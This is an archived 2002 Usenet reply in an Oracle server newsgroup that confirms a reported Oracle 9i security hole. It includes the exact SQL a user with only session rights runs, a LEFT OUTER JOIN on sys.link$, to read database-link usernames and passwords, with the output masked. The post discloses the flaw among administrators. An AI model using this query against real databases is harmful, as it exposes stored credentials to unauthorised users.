Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Usenet -> c.d.o.server -> Re: 9iDB Security Hole?

Re: 9iDB Security Hole?

From: Jonathan Lewis <jonathan_at_jlcomp.demon.co.uk>
Date: Mon, 15 Apr 2002 23:32:58 +0100
Message-ID: <1018909953.3789.0.nnrp-08.9e984b29@news.demon.co.uk>

Ouch - 9.0.1.3 on HP-UX

connect / as sysdba
CREATE USER us1 IDENTIFIED BY us11;
Grant Create Session To us1;

connect us1/us11

select a.userid, a.password
from sys.link$ a left outer join sys.link$ b on b.name= a.name
;

userid password
--------- --------------
XXX **********

--
Jonathan Lewis
http://www.jlcomp.demon.co.uk

Author of:
Practical Oracle 8i: Building Efficient Databases

Next Seminar - Australia - July/August
http://www.jlcomp.demon.co.uk/seminar.html

Host to The Co-Operative Oracle Users' FAQ
http://www.jlcomp.demon.co.uk/faq/ind_faq.html



Vladimir M. Zakharychev wrote in message ...

>Anyone with 9i can confirm this?
>
>
>
>This effectively means that LEFT OUTER JOIN allows to create views
>on tables that are normally not visible (provided that unprivileged user
>knows table and column names).
Received on Mon Apr 15 2002 - 17:32:58 CDT

Original text of this message

HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US